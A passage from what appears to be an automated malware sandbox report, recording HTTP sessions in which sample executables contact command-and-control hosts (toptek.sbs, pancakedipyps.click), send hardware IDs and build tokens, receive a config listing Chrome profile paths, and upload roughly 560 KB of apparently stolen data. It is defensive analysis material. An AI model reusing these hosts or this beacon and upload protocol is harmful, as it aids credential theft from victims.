                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2134&min_rtt=2125&rtt_var=816&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2234&delivery_rate=1326067&cwnd=169&unsent_bytes=0&cid=50985a156a2c8b0d&ts=1080&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:16:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:16:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.44981494.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:56 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:16:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:16:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.44981894.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:59 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----P8GLX4OZU37YU3WL6P8Q
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:16:59 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 42 37 35 41 45 30 31 32 34 46 34 30 33 33 30 36 30 30 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 2d 2d 0d
                                                                                                                                                                                                                                                            Data Ascii: ------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="hwid"19B75AE0124F4033060071-a33c7340-61ca------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------P8GLX4OZU37YU3WL6P8Q--
                                                                                                                                                                                                                                                            2024-12-21 21:17:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:00 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|53dbb863fe3c73b662b61cce04832eb2|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.44982194.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:01 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----OZUAIMOPZ58QIECBS00H
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 4d 4f 50 5a 35 38 51 49 45 43 42 53 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 4d 4f 50 5a 35 38 51 49 45 43 42 53 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 41 49 4d 4f 50 5a 35 38 51 49 45 43 42 53 30 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------OZUAIMOPZ58QIECBS00HContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------OZUAIMOPZ58QIECBS00HContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------OZUAIMOPZ58QIECBS00HCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:02 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:02 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                            Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            15192.168.2.449823172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ILJBMKU2
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 560129
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 2d 2d 49 4c 4a 42 4d 4b 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 4c 4a 42 4d 4b 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 4c 4a 42 4d 4b 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 49 4c 4a 42 4d 4b 55 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                            Data Ascii: --ILJBMKU2Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--ILJBMKU2Content-Disposition: form-data; name="pid"1--ILJBMKU2Content-Disposition: form-data; name="lid"FATE99--test--ILJBMKU2Content-Dispositi
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49
                                                                                                                                                                                                                                                            Data Ascii: )yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9I
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12
                                                                                                                                                                                                                                                            Data Ascii: %Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QW
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43
                                                                                                                                                                                                                                                            Data Ascii: [7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53
                                                                                                                                                                                                                                                            Data Ascii: G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6S
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d
                                                                                                                                                                                                                                                            Data Ascii: :.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}GzD[QuLSZmS,=
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75
                                                                                                                                                                                                                                                            Data Ascii: %3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]{/cf0Aarnu
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95
                                                                                                                                                                                                                                                            Data Ascii: ?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZW
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a
                                                                                                                                                                                                                                                            Data Ascii: 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ
                                                                                                                                                                                                                                                            2024-12-21 21:17:04 UTC15331OUTData Raw: 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19
                                                                                                                                                                                                                                                            Data Ascii: M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN52
                                                                                                                                                                                                                                                            2024-12-21 21:17:08 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=q78pvn5vjk1clistpup0gdqt5l; expires=Wed, 16 Apr 2025 15:03:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H92d9l0mddb1ZLId%2FVZJonDcINPsp8FdOgv2wcB3%2F%2FP7v2IXiGerFN6cNtqbqS3nKWmegG9dg7Wca9lEcX%2B4kUKAbZtpZy7xl7WUZy4xGeAnJOGYc4YP%2F7Ms4DsRERrXl3rNOXzd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae59a2bf77c82-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1943&rtt_var=756&sent=324&recv=582&lost=0&retrans=0&sent_bytes=2848&recv_bytes=562647&delivery_rate=1420924&cwnd=212&unsent_bytes=0&cid=2f3d3cba0f87b92c&ts=5494&x=0"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            16192.168.2.44982794.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:05 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IMY5PH47QQ9ZM79H47QQ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
